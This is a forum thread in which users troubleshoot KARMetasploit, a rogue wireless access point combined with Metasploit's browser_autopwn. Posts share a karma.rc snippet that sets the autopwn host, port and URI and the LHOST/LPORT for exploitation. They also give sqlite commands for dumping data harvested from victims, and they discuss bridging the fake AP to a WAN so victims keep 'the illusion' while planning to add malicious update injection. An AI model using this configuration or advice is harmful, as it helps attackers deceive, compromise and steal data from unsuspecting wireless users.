Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: KARMetasploit

  1. #1
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    1

    Question KARMetasploit

    Hi!
    I have been trying to get KARMetasploit to work and I have one problem.
    I can get everything up and runnig and I can see that dhcpd is offering a Windows XP client an IP with a DHCPOFFER. The problem is that the XP client does not send any DHCPACK back to the dhcpd service.

    I have read a lot on Google and found that this is a Windows "bug" that could be corrected on the Windows client. I do not want that solution because then KARMetasploit would be quite useless.

    So I found another solution on Google:
    route add -host 255.255.255.255 dev at0

    I tried it and I still don't get any IP. Do you have any other ideas?

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    You can get support for KARMetasploit via http://metasploit.com/dev/trac/wiki/Karmetasploit
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    You can also send the developer an email or catch him on the (freenode) IRC channel - #remote-exploit. His handle is 'hdm', and he is pretty nice guy when it comes to helping with matters similar to this.
    dd if=/dev/swc666 of=/dev/wyze

  4. #4
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    may want to check out some intresting notes here

    http://pauldotcom.com/wiki/index.php/Episode114

  5. #5
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Default

    Quote Originally Posted by operat0r View Post
    may want to check out some intresting notes here
    Thx for that link operat0r.

    This part (which I needed):

    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;

    Isn't on the website.

  6. #6
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    Quote Originally Posted by leaferz View Post
    Thx for that link operat0r.

    This part (which I needed):

    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;

    Isn't on the website.
    Cool so should I be able to get it working with the just link I gave you ? I have not messed with it yet

  7. #7
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Default

    Quote Originally Posted by operat0r View Post
    Cool so should I be able to get it working with the just link I gave you ? I have not messed with it yet
    Yep, without a hitch.

    The only difference from the main page is the karma.rc being used. Specifically this set of lines:

    use auxiliary/server/browser_autopwn

    setg AUTOPWN_HOST 10.0.0.1
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads

    set LHOST 10.0.0.1
    set LPORT 45000
    set SRVPORT 55550
    set URIPATH /ads

    run
    Gets the info it needs and crashes the browser. I had the same result with firefox 3.0.1 and ie 7.

    Taking those lines away keeps the user on. The only thing I left is configuring the proxy and/or dns. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.

  8. #8
    Just burned his ISO acebrazer's Avatar
    Join Date
    Mar 2008
    Posts
    10

    Default how to route fake-ap-clients to my WAN

    Quote Originally Posted by leaferz View Post

    The only thing I left is configuring the proxy and/or dns. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.
    *Aehemmm*...maybe i didnt get it, but IS there a way of leading some clients of MY evil-ap to my WAN, so the illusion would be perfect?

    And btw: the link @ pauldotcom is only working in the old manner - for atheros-cards, isnt it?

    greets, brazer ace

  9. #9
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Yes, it is possible to have fully transparent Karmetasploit keeping the illusion perfect. You need to setup a bridge between your fake AP and another internet connection. I have gotten this to work on my old hardware but I just got my brand new laptop yesterday and have been trying to get it up and running again.

    You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds.

    I have written a small tutorial for my own personal use to get everything up and running on my specific hardware, and I am toying around with the idea of releasing it and perhaps a video showing how to get a transparent Evil AP up and running. I think I will wait untill I integrate Evilgrade with Karmetasploit dubbed "BadKarma" (which is this weeks project) and then do a nice polished release by the end of the week if anyone is interested.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  10. #10
    Just burned his ISO acebrazer's Avatar
    Join Date
    Mar 2008
    Posts
    10

    Default

    Quote Originally Posted by Revelati View Post
    1.) You need to setup a bridge between your fake AP and another internet connection. ....
    ...You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds. ....

    2.) I think I will wait untill I integrate Evilgrade with Karmetasploit dubbed "BadKarma" (which is this weeks project) and then do a nice polished release by the end of the week if anyone is interested.
    >> 1.) this cant be too complicated, as if one compares the capacity of a linksys wrt54gl (with its maximum of 4096 connections) and a 433mhz linuxbox on which ipcop is routing the LAN, Wireless & WAN traffic in divided networks.

    >> 2.) i AM interested !! in both - the routing AND the BADKARMA.

    greets, bracer ace

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •